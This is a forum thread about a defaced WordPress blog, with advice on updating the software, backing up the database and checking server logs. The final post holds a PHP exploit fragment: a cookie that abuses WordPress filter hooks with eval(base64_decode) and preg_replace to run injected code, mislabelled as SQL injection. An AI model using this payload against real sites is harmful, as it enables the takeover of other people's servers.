What version of wordpress were you using?

Man that's a cowardly thing to do fucking with someone's biz.

That's only IF your host has gotten CPanel to update their stuff. Using this and ZenCart myself, I can tell you that CPanel is about two to three releases behind normally. I don't trust cPanel to update. That's my job.

Go to the WordPress website. Go to the Download Page. They will have listed there the current version of the software. Check your current version (at the bottom of any Wordpress admin page) If you have to update, download the software. Unzip it to your local PC.

FTP to your site. IF you have done your theme the proper way (using the wordpress tools) then you just need to upload the software over top of the existing software (after backing it up and backing up the SQL database of course). If not, then copy the files that are your theme to a local directoy on your PC, backup the current version and upload the new install. Rename the "Install" directory and CHMOD one of the files in the "admin" folder to 444 so it can't be changed. Put your theme back in place if you need to.

Go and check your blog out and make sure everything is working correctly and that's it. Takes about 10 minutes or so.

How do you back up a mysql db?

back up instructions:

http://codex.wordpress.org/WordPress_Backups

:1orglaugh :1orglaugh

Install phpmyadmin its real easy then.

I checked my raw server logs. Showed someone on my website for 2 + hours. I bet that's whoever did it. Grrrr.

The fucking BLOGBURGLAR.

Now that it's fixed, I can laugh at the blogburglar design. Funny shit.

And thanks to your advice, guys, I'm backing up all of my posts now.

its one thing for someone to hack your shit, but at least they didnt hack AND take the blog's url (that happened to me on blogspot.com 2 weeks ago).

i didnt put up a big fuss though cuz i switched that blog to a .com anyways. all it had was a re-direct script on it to the .com so whatever.

:1orglaugh @ blogburgular pic!

50 hackers....

Make sure you install the updated version of Wordpress. You're not the first this has happened to & the exploit is quite well known now. Sucks though. I think Hallmark should put out a line of "Sorry for your data loss" cards. It can be heartbreaking!

Check your server logs, and try to find out who did it.

:1orglaugh :1orglaugh

witch algo? it's just a md5 hash that must have been dump.
or something like that:
$str = base64_encode('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x');

$cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;';
$cookie.='wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;';
$cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=';
$cookie.=$str;
$cookie.=';wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;';
$cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;';
$cookie.='wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;';

simple sql injection :321GFY